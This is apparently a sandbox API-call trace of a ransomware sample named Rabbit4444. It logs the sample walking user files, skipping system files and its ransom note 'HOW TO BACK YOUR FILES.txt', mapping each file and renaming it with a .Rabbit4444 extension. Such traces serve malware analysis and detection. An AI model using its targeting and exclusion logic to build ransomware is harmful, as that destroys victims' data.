-1 [0059.074] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms" | out: lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms") returned="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms" [0059.074] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.074] lstrlenW (lpString="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms") returned 64 [0059.074] lstrlenW (lpString="Rabbit4444") returned 10 [0059.074] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.074] lstrlenW (lpString=".dll") returned 4 [0059.074] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.074] lstrlenW (lpString=".lnk") returned 4 [0059.074] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.074] lstrlenW (lpString=".ini") returned 4 [0059.074] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.075] lstrlenW (lpString=".sys") returned 4 [0059.075] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.075] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{821fb666-d307-4865-86bb-68725a30999c}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.075] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.075] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15038565381) returned 1 [0059.075] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1206) returned 1 [0059.075] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.075] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0059.075] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0059.076] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0059.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.077] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15038815453) returned 1 [0059.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0059.078] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.078] CloseHandle (hObject=0x298) returned 1 [0059.078] CloseHandle (hObject=0x278) returned 1 [0059.078] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms.Rabbit4444") returned 192 [0059.078] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{821fb666-d307-4865-86bb-68725a30999c}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{821fb666-d307-4865-86bb-68725a30999c}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.078] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c8c704, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52c8c704, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", cAlternateFileName="CL12FB~1.SET")) returned 1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2=".") returned 1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="..") returned 1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="windows") returned -1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="boot") returned 1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.079] lstrcmpiW (lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.079] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms" | out: lpString1="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms") returned="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms" [0059.079] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.079] lstrlenW (lpString="Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms") returned 64 [0059.079] lstrlenW (lpString="Rabbit4444") returned 10 [0059.079] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.079] lstrlenW (lpString=".dll") returned 4 [0059.079] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.079] lstrlenW (lpString=".lnk") returned 4 [0059.079] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.079] lstrlenW (lpString=".ini") returned 4 [0059.079] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.080] lstrlenW (lpString=".sys") returned 4 [0059.080] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.080] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{84c9670e-825d-4128-b173-2963886c5a3e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.080] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.080] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15039117915) returned 1 [0059.080] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1039) returned 1 [0059.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0059.081] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.082] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.083] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15039375455) returned 1 [0059.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0059.083] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.083] CloseHandle (hObject=0x298) returned 1 [0059.083] CloseHandle (hObject=0x278) returned 1 [0059.083] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms.Rabbit4444") returned 192 [0059.083] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{84c9670e-825d-4128-b173-2963886c5a3e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{84c9670e-825d-4128-b173-2963886c5a3e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.084] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52d250e5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52d250e5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", cAlternateFileName="CL7A5D~1.SET")) returned 1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2=".") returned 1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="..") returned 1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="windows") returned -1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="boot") returned 1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.084] lstrcmpiW (lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.084] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms" | out: lpString1="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms") returned="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms" [0059.084] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.085] lstrlenW (lpString="Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms") returned 64 [0059.085] lstrlenW (lpString="Rabbit4444") returned 10 [0059.085] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.085] lstrlenW (lpString=".dll") returned 4 [0059.085] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.085] lstrlenW (lpString=".lnk") returned 4 [0059.085] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.085] lstrlenW (lpString=".ini") returned 4 [0059.085] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.085] lstrlenW (lpString=".sys") returned 4 [0059.085] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.085] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8562b9b8-812d-420c-9189-dc216d788a49}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.085] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.085] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15039608431) returned 1 [0059.085] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=954) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0059.086] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.087] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.088] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.088] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15039874115) returned 1 [0059.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0059.088] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.088] CloseHandle (hObject=0x298) returned 1 [0059.088] CloseHandle (hObject=0x278) returned 1 [0059.088] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms.Rabbit4444") returned 192 [0059.088] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8562b9b8-812d-420c-9189-dc216d788a49}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8562b9b8-812d-420c-9189-dc216d788a49}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.089] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ec8a4a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52ec8a4a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", cAlternateFileName="CLEF84~1.SET")) returned 1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2=".") returned 1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="..") returned 1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="windows") returned -1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.089] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="boot") returned 1 [0059.090] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.090] lstrcmpiW (lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.090] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms" | out: lpString1="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms") returned="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms" [0059.090] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.090] lstrlenW (lpString="Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms") returned 64 [0059.090] lstrlenW (lpString="Rabbit4444") returned 10 [0059.090] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.090] lstrlenW (lpString=".dll") returned 4 [0059.090] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.090] lstrlenW (lpString=".lnk") returned 4 [0059.090] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.090] lstrlenW (lpString=".ini") returned 4 [0059.090] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.090] lstrlenW (lpString=".sys") returned 4 [0059.090] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.090] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{875fe7d6-5bdf-496f-b349-91e5e3625b86}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.090] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.090] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15040122893) returned 1 [0059.091] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1048) returned 1 [0059.091] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.091] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.091] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0059.092] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0059.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.093] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15040373772) returned 1 [0059.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.093] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: 